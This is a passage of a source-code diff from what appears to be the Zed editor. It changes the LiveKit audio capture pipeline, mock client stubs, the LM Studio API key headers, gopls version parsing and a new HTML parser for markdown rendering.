non-matching channel counts. + // NOTE: you can verify this by debug printing buf.len() after this stage. + // For 2->4 channel upmix, we should see buf.len=1920, buf we get only 960. + output_config.channels() as u32, sample_rate, output_config.channels() as u32, output_config.sample_rate(), @@ -315,7 +283,7 @@ impl AudioStack { // Block forever to keep the output stream alive end_on_drop_rx.recv().ok(); }) - .unwrap(); + .detach(); device_change_listener.next().await; drop(end_on_drop_tx) @@ -323,22 +291,23 @@ impl AudioStack { } async fn capture_input( + executor: BackgroundExecutor, apm: Arc>, - frame_tx: UnboundedSender>, + frame_tx: Sender, sample_rate: u32, num_channels: u32, + input_audio_device: Option, ) -> Result<()> { loop { let mut device_change_listener = DeviceChangeListener::new(true)?; - let (device, config) = crate::default_device(true)?; + let (device, config) = crate::default_device(true, input_audio_device.as_ref())?; let (end_on_drop_tx, end_on_drop_rx) = std::sync::mpsc::channel::<()>(); let apm = apm.clone(); - let frame_tx = frame_tx.clone(); + let mut frame_tx = frame_tx.clone(); let mut resampler = audio_resampler::AudioResampler::default(); - thread::Builder::new() - .name("AudioCapture".to_owned()) - .spawn(move || { + executor + .spawn_with_priority(Priority::RealtimeAudio, async move { maybe!({ if let Some(desc) = device.description().ok() { log::info!("Using microphone: {}", desc.name()) @@ -349,12 +318,21 @@ impl AudioStack { let ten_ms_buffer_size = (config.channels() as u32 * config.sample_rate() / 100) as usize; let mut buf: Vec = Vec::with_capacity(ten_ms_buffer_size); + let mut rodio_effects = RodioEffectsAdaptor::new(buf.len()) + .automatic_gain_control(AutomaticGainControlSettings { + target_level: 0.50, + attack_time: Duration::from_secs(1), + release_time: Duration::from_secs(0), + absolute_max_gain: 5.0, + }) + .limit(LimitSettings::live_performance()); let stream = device .build_input_stream_raw( &config.config(), config.sample_format(), move |data, _: &_| { + let captured_at = Instant::now(); let data = crate::get_sample_data(config.sample_format(), data) .log_err(); let Some(data) = data else { @@ -379,6 +357,21 @@ impl AudioStack { sample_rate, ) .to_owned(); + + if audio::LIVE_SETTINGS + .auto_microphone_volume + .load(Ordering::Relaxed) + { + rodio_effects + .inner_mut() + .inner_mut() + .fill_buffer_with(&sampled); + sampled.clear(); + sampled.extend(SampleTypeConverter::<_, i16>::new( + rodio_effects.by_ref(), + )); + } + apm.lock() .process_stream( &mut sampled, @@ -387,12 +380,16 @@ impl AudioStack { ) .log_err(); buf.clear(); + frame_tx - .unbounded_send(AudioFrame { - data: Cow::Owned(sampled), - sample_rate, - num_channels, - samples_per_channel: sample_rate / 100, + .try_send(TimestampedFrame { + frame: AudioFrame { + data: Cow::Owned(sampled), + sample_rate, + num_channels, + samples_per_channel: sample_rate / 100, + }, + captured_at, }) .ok(); } @@ -410,7 +407,7 @@ impl AudioStack { }) .log_err(); }) - .unwrap(); + .detach(); device_change_listener.next().await; drop(end_on_drop_tx) @@ -418,39 +415,73 @@ impl AudioStack { } } -#[derive(Serialize, Deserialize, Debug)] -pub struct Speaker { - pub name: String, - pub is_staff: bool, - pub sends_legacy_audio: bool, +/// This allows using of Rodio's effects library within our home brewn audio +/// pipeline. The alternative would be inlining Rodio's effects which is +/// problematic from a legal stance. We would then have to make clear that code +/// is not owned by zed-industries while the code would be surrounded by +/// zed-industries owned code. +/// +/// This adaptor does incur a slight performance penalty (copying into a +/// pre-allocated vec and back) however the impact will be immeasurably low. +/// +/// There is no latency impact. +pub struct RodioEffectsAdaptor { + input: Vec, + pos: usize, } -fn send_to_livekit(frame_tx: UnboundedSender>, mut microphone: impl Source) { - use cpal::Sample; - let sample_rate = microphone.sample_rate().get(); - let num_channels = microphone.channels().get() as u32; - let buffer_size = sample_rate / 100 * num_channels; - - loop { - let sampled: Vec<_> = microphone - .by_ref() - .take(buffer_size as usize) - .map(|s| s.to_sample()) - .collect(); - - if frame_tx - .unbounded_send(AudioFrame { - sample_rate, - num_channels, - samples_per_channel: sampled.len() as u32 / num_channels, - data: Cow::Owned(sampled), - }) - .is_err() - { - // must rx has dropped or is not consuming - break; +impl RodioEffectsAdaptor { + // This implementation incorrect terminology confusing everyone. A normal + // audio frame consists of all samples for one moment in time (one for mono, + // two for stereo). Here a frame of audio refers to a 10ms buffer of samples. + fn new(samples_per_frame: usize) -> Self { + Self { + input: Vec::with_capacity(samples_per_frame), + pos: 0, } } + + fn fill_buffer_with(&mut self, integer_samples: &[i16]) { + self.input.clear(); + self.input.extend(SampleTypeConverter::<_, f32>::new( + integer_samples.iter().copied(), + )); + self.pos = 0; + } +} + +impl Iterator for RodioEffectsAdaptor { + type Item = rodio::Sample; + + fn next(&mut self) -> Option { + let sample = self.input.get(self.pos)?; + self.pos += 1; + Some(*sample) + } +} + +impl rodio::Source for RodioEffectsAdaptor { + fn current_span_len(&self) -> Option { + None + } + + fn channels(&self) -> rodio::ChannelCount { + rodio::nz!(2) + } + + fn sample_rate(&self) -> rodio::SampleRate { + rodio::nz!(48000) + } + + fn total_duration(&self) -> Option { + None + } +} + +#[derive(Serialize, Deserialize, Debug)] +pub struct Speaker { + pub name: String, + pub is_staff: bool, } use super::LocalVideoTrack; @@ -466,10 +497,13 @@ pub(crate) async fn capture_local_video_track( ) -> Result<(crate::LocalVideoTrack, Box)> { let metadata = capture_source.metadata()?; let track_source = gpui_tokio::Tokio::spawn(cx, async move { - NativeVideoSource::new(VideoResolution { - width: metadata.resolution.width.0 as u32, - height: metadata.resolution.height.0 as u32, - }) + NativeVideoSource::new( + VideoResolution { + width: metadata.resolution.width.0 as u32, + height: metadata.resolution.height.0 as u32, + }, + true, + ) }) .await?; diff --git a/crates/livekit_client/src/livekit_client/playback/source.rs b/crates/livekit_client/src/livekit_client/playback/source.rs deleted file mode 100644 index b90c3613f8215481a4a535eb81c665fccae80e5c..0000000000000000000000000000000000000000 --- a/crates/livekit_client/src/livekit_client/playback/source.rs +++ /dev/null @@ -1,92 +0,0 @@ -use std::num::NonZero; - -use futures::StreamExt; -use libwebrtc::{audio_stream::native::NativeAudioStream, prelude::AudioFrame}; -use livekit::track::RemoteAudioTrack; -use rodio::{ - ChannelCount, SampleRate, Source, buffer::SamplesBuffer, conversions::SampleTypeConverter, -}; - -use audio::{CHANNEL_COUNT, LEGACY_CHANNEL_COUNT, LEGACY_SAMPLE_RATE, SAMPLE_RATE}; - -fn frame_to_samplesbuffer(frame: AudioFrame) -> SamplesBuffer { - let samples = frame.data.iter().copied(); - let samples = SampleTypeConverter::<_, _>::new(samples); - let samples: Vec = samples.collect(); - SamplesBuffer::new( - NonZero::new(frame.num_channels as u16).expect("zero channels is nonsense"), - NonZero::new(frame.sample_rate).expect("samplerate zero is nonsense"), - samples, - ) -} - -pub struct LiveKitStream { - // shared_buffer: SharedBuffer, - inner: rodio::queue::SourcesQueueOutput, - _receiver_task: gpui::Task<()>, - channel_count: ChannelCount, - sample_rate: SampleRate, -} - -impl LiveKitStream { - pub fn new( - executor: &gpui::BackgroundExecutor, - track: &RemoteAudioTrack, - legacy: bool, - ) -> Self { - let (channel_count, sample_rate) = if legacy { - (LEGACY_CHANNEL_COUNT, LEGACY_SAMPLE_RATE) - } else { - (CHANNEL_COUNT, SAMPLE_RATE) - }; - - let mut stream = NativeAudioStream::new( - track.rtc_track(), - sample_rate.get() as i32, - channel_count.get().into(), - ); - let (queue_input, queue_output) = rodio::queue::queue(true); - // spawn rtc stream - let receiver_task = executor.spawn_with_priority(gpui::Priority::RealtimeAudio, { - async move { - while let Some(frame) = stream.next().await { - let samples = frame_to_samplesbuffer(frame); - queue_input.append(samples); - } - } - }); - - LiveKitStream { - _receiver_task: receiver_task, - inner: queue_output, - sample_rate, - channel_count, - } - } -} - -impl Iterator for LiveKitStream { - type Item = rodio::Sample; - - fn next(&mut self) -> Option { - self.inner.next() - } -} - -impl Source for LiveKitStream { - fn current_span_len(&self) -> Option { - self.inner.current_span_len() - } - - fn channels(&self) -> rodio::ChannelCount { - self.channel_count - } - - fn sample_rate(&self) -> rodio::SampleRate { - self.sample_rate - } - - fn total_duration(&self) -> Option { - self.inner.total_duration() - } -} diff --git a/crates/livekit_client/src/mock_client.rs b/crates/livekit_client/src/mock_client.rs index 4c19cb4d57695f86b98c299646a376edb64414b7..d1cd399d256d6b826de349d9fe533f45990c5f04 100644 --- a/crates/livekit_client/src/mock_client.rs +++ b/crates/livekit_client/src/mock_client.rs @@ -15,7 +15,7 @@ pub type LocalTrackPublication = publication::LocalTrackPublication; pub type LocalParticipant = participant::LocalParticipant; pub type Room = test::Room; -pub use test::{ConnectionState, ParticipantIdentity, TrackSid}; +pub use test::{ConnectionState, ParticipantIdentity, RtcStats, SessionStats, TrackSid}; pub struct AudioStream {} diff --git a/crates/livekit_client/src/mock_client/participant.rs b/crates/livekit_client/src/mock_client/participant.rs index 033808cbb54189fa2a7841264097751da4deb027..d3f720c5d8a07a99459943078aeaafbdfabec79f 100644 --- a/crates/livekit_client/src/mock_client/participant.rs +++ b/crates/livekit_client/src/mock_client/participant.rs @@ -1,6 +1,6 @@ use crate::{ - AudioStream, LocalAudioTrack, LocalTrackPublication, LocalVideoTrack, Participant, - ParticipantIdentity, RemoteTrack, RemoteTrackPublication, TrackSid, + AudioStream, ConnectionQuality, LocalAudioTrack, LocalTrackPublication, LocalVideoTrack, + Participant, ParticipantIdentity, RemoteTrack, RemoteTrackPublication, TrackSid, test::{Room, WeakRoom}, }; use anyhow::Result; @@ -8,6 +8,7 @@ use collections::HashMap; use gpui::{ AsyncApp, DevicePixels, ScreenCaptureSource, ScreenCaptureStream, SourceMetadata, size, }; +use std::sync::{Arc, atomic::AtomicU64}; #[derive(Clone, Debug)] pub struct LocalParticipant { @@ -28,9 +29,31 @@ impl Participant { Participant::Remote(participant) => participant.identity.clone(), } } + + pub fn connection_quality(&self) -> ConnectionQuality { + match self { + Participant::Local(p) => p.connection_quality(), + Participant::Remote(p) => p.connection_quality(), + } + } + + pub fn audio_level(&self) -> f32 { + match self { + Participant::Local(p) => p.audio_level(), + Participant::Remote(p) => p.audio_level(), + } + } } impl LocalParticipant { + pub fn connection_quality(&self) -> ConnectionQuality { + ConnectionQuality::Excellent + } + + pub fn audio_level(&self) -> f32 { + 0.0 + } + pub async fn unpublish_track(&self, track: TrackSid, _cx: &AsyncApp) -> Result<()> { self.room .test_server() @@ -41,7 +64,7 @@ impl LocalParticipant { pub(crate) async fn publish_microphone_track( &self, _cx: &AsyncApp, - ) -> Result<(LocalTrackPublication, AudioStream)> { + ) -> Result<(LocalTrackPublication, AudioStream, Arc)> { let this = self.clone(); let server = this.room.test_server(); let sid = server @@ -54,6 +77,7 @@ impl LocalParticipant { sid, }, AudioStream {}, + Arc::new(AtomicU64::new(0)), )) } @@ -75,9 +99,42 @@ impl LocalParticipant { Box::new(TestScreenCaptureStream {}), )) } + + #[cfg(target_os = "linux")] + pub async fn publish_screenshare_track_wayland( + &self, + _cx: &mut AsyncApp, + ) -> Result<( + LocalTrackPublication, + Box, + futures::channel::oneshot::Receiver<()>, + )> { + let (_failure_tx, failure_rx) = futures::channel::oneshot::channel(); + let this = self.clone(); + let server = this.room.test_server(); + let sid = server + .publish_video_track(this.room.token(), LocalVideoTrack {}) + .await?; + Ok(( + LocalTrackPublication { + room: self.room.downgrade(), + sid, + }, + Box::new(TestWaylandScreenCaptureStream::new()), + failure_rx, + )) + } } impl RemoteParticipant { + pub fn connection_quality(&self) -> ConnectionQuality { + ConnectionQuality::Excellent + } + + pub fn audio_level(&self) -> f32 { + 0.0 + } + pub fn track_publications(&self) -> HashMap { if let Some(room) = self.room.upgrade() { let server = room.test_server(); @@ -134,3 +191,32 @@ impl ScreenCaptureStream for TestScreenCaptureStream { }) } } + +#[cfg(target_os = "linux")] +static NEXT_TEST_WAYLAND_SHARE_ID: AtomicU64 = AtomicU64::new(1); + +#[cfg(target_os = "linux")] +struct TestWaylandScreenCaptureStream { + id: u64, +} + +#[cfg(target_os = "linux")] +impl TestWaylandScreenCaptureStream { + fn new() -> Self { + Self { + id: NEXT_TEST_WAYLAND_SHARE_ID.fetch_add(1, std::sync::atomic::Ordering::Relaxed), + } + } +} + +#[cfg(target_os = "linux")] +impl ScreenCaptureStream for TestWaylandScreenCaptureStream { + fn metadata(&self) -> Result { + Ok(SourceMetadata { + id: self.id, + is_main: None, + label: None, + resolution: size(DevicePixels(1), DevicePixels(1)), + }) + } +} diff --git a/crates/livekit_client/src/record.rs b/crates/livekit_client/src/record.rs index c23ab2b938178e9b634f8e0d4d298f2c86450b51..c0fe9eb7218ad8550f7b63042d0e11c2cb53ee20 100644 --- a/crates/livekit_client/src/record.rs +++ b/crates/livekit_client/src/record.rs @@ -7,20 +7,22 @@ use std::{ }; use anyhow::{Context, Result}; +use cpal::DeviceId; use cpal::traits::{DeviceTrait, StreamTrait}; use rodio::{buffer::SamplesBuffer, conversions::SampleTypeConverter}; use util::ResultExt; pub struct CaptureInput { pub name: String, + pub input_device: Option, config: cpal::SupportedStreamConfig, samples: Arc>>, _stream: cpal::Stream, } impl CaptureInput { - pub fn start() -> anyhow::Result { - let (device, config) = crate::default_device(true)?; + pub fn start(input_device: Option) -> anyhow::Result { + let (device, config) = crate::default_device(true, input_device.as_ref())?; let name = device .description() .map(|desc| desc.name().to_string()) @@ -32,6 +34,7 @@ impl CaptureInput { Ok(Self { name, + input_device, _stream: stream, config, samples, diff --git a/crates/livekit_client/src/test.rs b/crates/livekit_client/src/test.rs index a8222b9a18b719f59ccaebdff6e08b7ee4edef67..4b5efe0aafbe5c27be0de973bc05e9901dd032ae 100644 --- a/crates/livekit_client/src/test.rs +++ b/crates/livekit_client/src/test.rs @@ -10,7 +10,7 @@ use parking_lot::Mutex; use postage::{mpsc, sink::Sink}; use std::sync::{ Arc, Weak, - atomic::{AtomicBool, Ordering::SeqCst}, + atomic::{AtomicBool, AtomicU64, Ordering::SeqCst}, }; #[derive(Clone, Debug, Eq, Hash, PartialEq, PartialOrd, Ord)] @@ -40,6 +40,15 @@ pub enum ConnectionState { Disconnected, } +#[derive(Clone, Debug, Default)] +pub struct SessionStats { + pub publisher_stats: Vec, + pub subscriber_stats: Vec, +} + +#[derive(Clone, Debug)] +pub enum RtcStats {} + static SERVERS: Mutex>> = Mutex::new(BTreeMap::new()); pub struct TestServer { @@ -739,9 +748,17 @@ impl Room { _track_name: String, _is_staff: bool, cx: &mut AsyncApp, - ) -> Result<(LocalTrackPublication, AudioStream)> { + ) -> Result<(LocalTrackPublication, AudioStream, Arc)> { self.local_participant().publish_microphone_track(cx).await } + + pub async fn get_stats(&self) -> Result { + Ok(SessionStats::default()) + } + + pub fn stats_task(&self, _cx: &impl gpui::AppContext) -> gpui::Task> { + gpui::Task::ready(Ok(SessionStats::default())) + } } impl Drop for RoomState { diff --git a/crates/lmstudio/src/lmstudio.rs b/crates/lmstudio/src/lmstudio.rs index ef2f7b6208f62e079609049b8eff83a80034741e..8a44b7fdefe5262d955606b0413b2b2425014296 100644 --- a/crates/lmstudio/src/lmstudio.rs +++ b/crates/lmstudio/src/lmstudio.rs @@ -354,14 +354,19 @@ pub struct ResponseMessageDelta { pub async fn complete( client: &dyn HttpClient, api_url: &str, + api_key: Option<&str>, request: ChatCompletionRequest, ) -> Result { let uri = format!("{api_url}/chat/completions"); - let request_builder = HttpRequest::builder() + let mut request_builder = HttpRequest::builder() .method(Method::POST) .uri(uri) .header("Content-Type", "application/json"); + if let Some(api_key) = api_key { + request_builder = request_builder.header("Authorization", format!("Bearer {}", api_key)); + } + let serialized_request = serde_json::to_string(&request)?; let request = request_builder.body(AsyncBody::from(serialized_request))?; @@ -386,14 +391,19 @@ pub async fn complete( pub async fn stream_chat_completion( client: &dyn HttpClient, api_url: &str, + api_key: Option<&str>, request: ChatCompletionRequest, ) -> Result>> { let uri = format!("{api_url}/chat/completions"); - let request_builder = http::Request::builder() + let mut request_builder = http::Request::builder() .method(Method::POST) .uri(uri) .header("Content-Type", "application/json"); + if let Some(api_key) = api_key { + request_builder = request_builder.header("Authorization", format!("Bearer {}", api_key)); + } + let request = request_builder.body(AsyncBody::from(serde_json::to_string(&request)?))?; let mut response = client.send(request).await?; if response.status().is_success() { @@ -434,14 +444,19 @@ pub async fn stream_chat_completion( pub async fn get_models( client: &dyn HttpClient, api_url: &str, + api_key: Option<&str>, _: Option, ) -> Result> { let uri = format!("{api_url}/models"); - let request_builder = HttpRequest::builder() + let mut request_builder = HttpRequest::builder() .method(Method::GET) .uri(uri) .header("Accept", "application/json"); + if let Some(api_key) = api_key { + request_builder = request_builder.header("Authorization", format!("Bearer {}", api_key)); + } + let request = request_builder.body(AsyncBody::default())?; let mut response = client.send(request).await?; diff --git a/crates/lsp/Cargo.toml b/crates/lsp/Cargo.toml index 9533ddb600b18213de4d6e50599c62aa182b9b8a..2c48575a648a9eba12b16ce8edb2cf959d7cc8b3 100644 --- a/crates/lsp/Cargo.toml +++ b/crates/lsp/Cargo.toml @@ -13,12 +13,13 @@ path = "src/lsp.rs" doctest = false [features] -test-support = ["async-pipe"] +test-support = ["async-pipe", "gpui_util"] [dependencies] anyhow.workspace = true async-pipe = { workspace = true, optional = true } collections.workspace = true +gpui_util = { workspace = true, optional = true } futures.workspace = true gpui.workspace = true log.workspace = true @@ -34,6 +35,7 @@ release_channel.workspace = true [dev-dependencies] async-pipe.workspace = true +gpui_util.workspace = true ctor.workspace = true gpui = { workspace = true, features = ["test-support"] } semver.workspace = true diff --git a/crates/lsp/src/lsp.rs b/crates/lsp/src/lsp.rs index e552c21d701cefa8aa1f4b6e14e826892e3b25b6..00fe0f59f1c71cd0c36e7f579b058191eff8f898 100644 --- a/crates/lsp/src/lsp.rs +++ b/crates/lsp/src/lsp.rs @@ -1306,6 +1306,29 @@ impl LanguageServer { self.version.clone() } + /// Get the readable version of the running language server. + pub fn readable_version(&self) -> Option { + match self.name().as_ref() { + "gopls" => { + // Gopls returns a detailed JSON object as its version string; we must parse it to extract the semantic version. + // Example: `{"GoVersion":"go1.26.0","Path":"golang.org/x/tools/gopls","Main":{},"Deps":[],"Settings":[],"Version":"v0.21.1"}` + self.version + .as_ref() + .and_then(|obj| { + #[derive(Deserialize)] + struct GoplsVersion<'a> { + #[serde(rename = "Version")] + version: &'a str, + } + let parsed: GoplsVersion = serde_json::from_str(obj.as_str()).ok()?; + Some(parsed.version.trim_start_matches("v").to_owned().into()) + }) + .or_else(|| self.version.clone()) + } + _ => self.version.clone(), + } + } + /// Get the process name of the running language server. pub fn process_name(&self) -> &str { &self.process_name @@ -1970,10 +1993,14 @@ impl FakeLanguageServer { let responded_tx = responded_tx.clone(); let executor = cx.background_executor().clone(); async move { + let _guard = gpui_util::defer({ + let responded_tx = responded_tx.clone(); + move || { + responded_tx.unbounded_send(()).ok(); + } + }); executor.simulate_random_delay().await; - let result = result.await; - responded_tx.unbounded_send(()).ok(); - result + result.await } }) .detach(); diff --git a/crates/markdown/Cargo.toml b/crates/markdown/Cargo.toml index c923d3f704488a5364707486d25181188f74f166..be12bf2fe7f42e14c1723a8560a7f3c46ca83182 100644 --- a/crates/markdown/Cargo.toml +++ b/crates/markdown/Cargo.toml @@ -19,17 +19,23 @@ test-support = [ ] [dependencies] +anyhow.workspace = true base64.workspace = true collections.workspace = true futures.workspace = true gpui.workspace = true +html5ever.workspace = true language.workspace = true linkify.workspace = true log.workspace = true +markup5ever_rcdom.workspace = true +mermaid-rs-renderer.workspace = true pulldown-cmark.workspace = true settings.workspace = true +stacksafe.workspace = true sum_tree.workspace = true theme.workspace = true +theme_settings.workspace = true ui.workspace = true util.workspace = true diff --git a/crates/markdown/examples/markdown.rs b/crates/markdown/examples/markdown.rs index aa132443ee69201f0f1eba7b69c9627aee8f27e7..26c45377c725ec4d6701e4cf177615e3de4aba7e 100644 --- a/crates/markdown/examples/markdown.rs +++ b/crates/markdown/examples/markdown.rs @@ -41,7 +41,7 @@ pub fn main() { cx.bind_keys([KeyBinding::new("cmd-c", markdown::Copy, None)]); let node_runtime = NodeRuntime::unavailable(); - theme::init(LoadThemes::JustBase, cx); + theme_settings::init(LoadThemes::JustBase, cx); let fs = fs::FakeFs::new(cx.background_executor().clone()); let language_registry = LanguageRegistry::new(cx.background_executor().clone()); diff --git a/crates/markdown/examples/markdown_as_child.rs b/crates/markdown/examples/markdown_as_child.rs index b25b075dd3cb04ed949e1e30ed724c3b5f3088d1..38a4d2795f4ff97297c3d549f8de687827ff75ef 100644 --- a/crates/markdown/examples/markdown_as_child.rs +++ b/crates/markdown/examples/markdown_as_child.rs @@ -28,7 +28,7 @@ pub fn main() { let language_registry = Arc::new(LanguageRegistry::new(cx.background_executor().clone())); let fs = fs::FakeFs::new(cx.background_executor().clone()); languages::init(language_registry, fs, node_runtime, cx); - theme::init(LoadThemes::JustBase, cx); + theme_settings::init(LoadThemes::JustBase, cx); Assets.load_fonts(cx).unwrap(); cx.activate(true); diff --git a/crates/markdown/src/html.rs b/crates/markdown/src/html.rs new file mode 100644 index 0000000000000000000000000000000000000000..cf37f6138cd49733b5ca6f093ced9a00481f4edb --- /dev/null +++ b/crates/markdown/src/html.rs @@ -0,0 +1,3 @@ +mod html_minifier; +pub(crate) mod html_parser; +mod html_rendering; diff --git a/crates/markdown_preview/src/markdown_minifier.rs b/crates/markdown/src/html/html_minifier.rs similarity index 100% rename from crates/markdown_preview/src/markdown_minifier.rs rename to crates/markdown/src/html/html_minifier.rs diff --git a/crates/markdown/src/html/html_parser.rs b/crates/markdown/src/html/html_parser.rs new file mode 100644 index 0000000000000000000000000000000000000000..20338ec2abef2314b7cd6ca91e45ee05be909745 --- /dev/null +++ b/crates/markdown/src/html/html_parser.rs @@ -0,0 +1,883 @@ +use std::{cell::RefCell, collections::HashMap, mem, ops::Range}; + +use gpui::{DefiniteLength, FontWeight, SharedString, px, relative}; +use html5ever::{ + Attribute, LocalName, ParseOpts, local_name, parse_document, tendril::TendrilSink, +}; +use markup5ever_rcdom::{Node, NodeData, RcDom}; +use pulldown_cmark::{Alignment, HeadingLevel}; +use stacksafe::stacksafe; + +use crate::html::html_minifier::{Minifier, MinifierOptions}; + +#[derive(Debug, Clone, Default)] +#[cfg_attr(test, derive(PartialEq))] +pub(crate) struct ParsedHtmlBlock { + pub source_range: Range, + pub children: Vec, +} + +#[derive(Debug, Clone)] +#[cfg_attr(test, derive(PartialEq))] +pub(crate) enum ParsedHtmlElement { + Heading(ParsedHtmlHeading), + List(ParsedHtmlList), + Table(ParsedHtmlTable), + BlockQuote(ParsedHtmlBlockQuote), + Paragraph(HtmlParagraph), + Image(HtmlImage), +} + +impl ParsedHtmlElement { + pub fn source_range(&self) -> Option> { + Some(match self { + Self::Heading(heading) => heading.source_range.clone(), + Self::List(list) => list.source_range.clone(), + Self::Table(table) => table.source_range.clone(), + Self::BlockQuote(block_quote) => block_quote.source_range.clone(), + Self::Paragraph(text) => match text.first()? { + HtmlParagraphChunk::Text(text) => text.source_range.clone(), + HtmlParagraphChunk::Image(image) => image.source_range.clone(), + }, + Self::Image(image) => image.source_range.clone(), + }) + } +} + +pub(crate) type HtmlParagraph = Vec; + +#[derive(Debug, Clone)] +#[cfg_attr(test, derive(PartialEq))] +pub(crate) enum HtmlParagraphChunk { + Text(ParsedHtmlText), + Image(HtmlImage), +} + +#[derive(Debug, Clone)] +#[cfg_attr(test, derive(PartialEq))] +pub(crate) struct ParsedHtmlList { + pub source_range: Range, + pub depth: u16, + pub ordered: bool, + pub items: Vec, +} + +#[derive(Debug, Clone)] +#[cfg_attr(test, derive(PartialEq))] +pub(crate) struct ParsedHtmlListItem { + pub source_range: Range, + pub item_type: ParsedHtmlListItemType, + pub content: Vec, +} + +#[derive(Debug, Clone)] +#[cfg_attr(test, derive(PartialEq))] +pub(crate) enum ParsedHtmlListItemType { + Ordered(u64), + Unordered, +} + +#[derive(Debug, Clone)] +#[cfg_attr(test, derive(PartialEq))] +pub(crate) struct ParsedHtmlHeading { + pub source_range: Range, + pub level: HeadingLevel, + pub contents: HtmlParagraph, +} + +#[derive(Debug, Clone)] +#[cfg_attr(test, derive(PartialEq))] +pub(crate) struct ParsedHtmlTable { + pub source_range: Range, + pub header: Vec, + pub body: Vec, + pub caption: Option, +} + +#[derive(Debug, Clone)] +#[cfg_attr(test, derive(PartialEq))] +pub(crate) struct ParsedHtmlTableColumn { + pub col_span: usize, + pub row_span: usize, + pub is_header: bool, + pub children: HtmlParagraph, + pub alignment: Alignment, +} + +#[derive(Debug, Clone, Default)] +#[cfg_attr(test, derive(PartialEq))] +pub(crate) struct ParsedHtmlTableRow { + pub columns: Vec, +} + +#[derive(Debug, Clone)] +#[cfg_attr(test, derive(PartialEq))] +pub(crate) struct ParsedHtmlBlockQuote { + pub source_range: Range, + pub children: Vec, +} + +#[derive(Debug, Clone)] +#[cfg_attr(test, derive(PartialEq))] +pub(crate) struct ParsedHtmlText { + pub source_range: Range, + pub contents: SharedString, + pub highlights: Vec<(Range, HtmlHighlightStyle)>, + pub links: Vec<(Range, SharedString)>, +} + +#[derive(Debug, Clone, Default, PartialEq, Eq)] +pub(crate) struct HtmlHighlightStyle { + pub italic: bool, + pub underline: bool, + pub strikethrough: bool, + pub weight: FontWeight, + pub link: bool, + pub oblique: bool, +} + +#[derive(Debug, Clone)] +#[cfg_attr(test, derive(PartialEq))] +pub(crate) struct HtmlImage { + pub dest_url: SharedString, + pub source_range: Range, + pub alt_text: Option, + pub width: Option, + pub height: Option, +} + +impl HtmlImage { + fn new(dest_url: String, source_range: Range) -> Self { + Self { + dest_url: dest_url.into(), + source_range, + alt_text: None, + width: None, + height: None, + } + } + + fn set_alt_text(&mut self, alt_text: SharedString) { + self.alt_text = Some(alt_text); + } + + fn set_width(&mut self, width: DefiniteLength) { + self.width = Some(width); + } + + fn set_height(&mut self, height: DefiniteLength) { + self.height = Some(height); + } +} + +#[derive(Debug)] +struct ParseHtmlNodeContext { + list_item_depth: u16, +} + +impl Default for ParseHtmlNodeContext { + fn default() -> Self { + Self { list_item_depth: 1 } + } +} + +pub(crate) fn parse_html_block( + source: &str, + source_range: Range, +) -> Option { + let bytes = cleanup_html(source); + let mut cursor = std::io::Cursor::new(bytes); + let dom = parse_document(RcDom::default(), ParseOpts::default()) + .from_utf8() + .read_from(&mut cursor) + .ok()?; + + let mut children = Vec::new(); + parse_html_node( + source_range.clone(), + &dom.document, + &mut children, + &ParseHtmlNodeContext::default(), + ); + + Some(ParsedHtmlBlock { + source_range, + children, + }) +} + +fn cleanup_html(source: &str) -> Vec { + let mut writer = std::io::Cursor::new(Vec::new()); + let mut reader = std::io::Cursor::new(source); + let mut minify = Minifier::new( + &mut writer, + MinifierOptions { + omit_doctype: true, + collapse_whitespace: true, + ..Default::default() + }, + ); + if let Ok(()) = minify.minify(&mut reader) { + writer.into_inner() + } else { + source.bytes().collect() + } +} + +#[stacksafe] +fn parse_html_node( + source_range: Range, + node: &Node, + elements: &mut Vec, + context: &ParseHtmlNodeContext, +) { + match &node.data { + NodeData::Document => { + consume_children(source_range, node, elements, context); + } + NodeData::Text { contents } => { + elements.push(ParsedHtmlElement::Paragraph(vec![ + HtmlParagraphChunk::Text(ParsedHtmlText { + source_range, + highlights: Vec::default(), + links: Vec::default(), + contents: contents.borrow().to_string().into(), + }), + ])); + } + NodeData::Comment { .. } => {} + NodeData::Element { name, attrs, .. } => { + let mut styles = if let Some(styles) = + html_style_from_html_styles(extract_styles_from_attributes(attrs)) + { + vec![styles] + } else { + Vec::default() + }; + + if name.local == local_name!("img") { + if let Some(image) = extract_image(source_range, attrs) { + elements.push(ParsedHtmlElement::Image(image)); + } + } else if name.local == local_name!("p") { + let mut paragraph = HtmlParagraph::new(); + parse_paragraph( + source_range, + node, + &mut paragraph, + &mut styles, + &mut Vec::new(), + ); + + if !paragraph.is_empty() { + elements.push(ParsedHtmlElement::Paragraph(paragraph)); + } + } else if matches!( + name.local, + local_name!("h1") + | local_name!("h2") + | local_name!("h3") + | local_name!("h4") + | local_name!("h5") + | local_name!("h6") + ) { + let mut paragraph = HtmlParagraph::new(); + consume_paragraph( + source_range.clone(), + node, + &mut paragraph, + &mut styles, + &mut Vec::new(), + ); + + if !paragraph.is_empty() { + elements.push(ParsedHtmlElement::Heading(ParsedHtmlHeading { + source_range, + level: match name.local { + local_name!("h1") => HeadingLevel::H1, + local_name!("h2") => HeadingLevel::H2, + local_name!("h3") => HeadingLevel::H3, + local_name!("h4") => HeadingLevel::H4, + local_name!("h5") => HeadingLevel::H5, + local_name!("h6") => HeadingLevel::H6, + _ => unreachable!(), + }, + contents: paragraph, + })); + } + } else if name.local == local_name!("ul") || name.local == local_name!("ol") { + if let Some(list) = extract_html_list( + node, + name.local == local_name!("ol"), + context.list_item_depth, + source_range, + ) { + elements.push(ParsedHtmlElement::List(list)); + } + } else if name.local == local_name!("blockquote") { + if let Some(blockquote) = extract_html_blockquote(node, source_range) { + elements.push(ParsedHtmlElement::BlockQuote(blockquote)); + } + } else if name.local == local_name!("table") { + if let Some(table) = extract_html_table(node, source_range) { + elements.push(ParsedHtmlElement::Table(table)); + } + } else { + consume_children(source_range, node, elements, context); + } + } + _ => {} + } +} + +#[stacksafe] +fn parse_paragraph( + source_range: Range, + node: &Node, + paragraph: &mut HtmlParagraph, + highlights: &mut Vec, + links: &mut Vec, +) { + fn items_with_range( + range: Range, + items: impl IntoIterator, + ) -> Vec<(Range, T)> { + items + .into_iter() + .map(|item| (range.clone(), item)) + .collect() + } + + match &node.data { + NodeData::Text { contents } => { + if let Some(text) = + paragraph + .iter_mut() + .last() + .and_then(|paragraph_chunk| match paragraph_chunk { + HtmlParagraphChunk::Text(text) => Some(text), + _ => None, + }) + { + let mut new_text = text.contents.to_string(); + new_text.push_str(&contents.borrow()); + + text.highlights.extend(items_with_range( + text.contents.len()..new_text.len(), + mem::take(highlights), + )); + text.links.extend(items_with_range( + 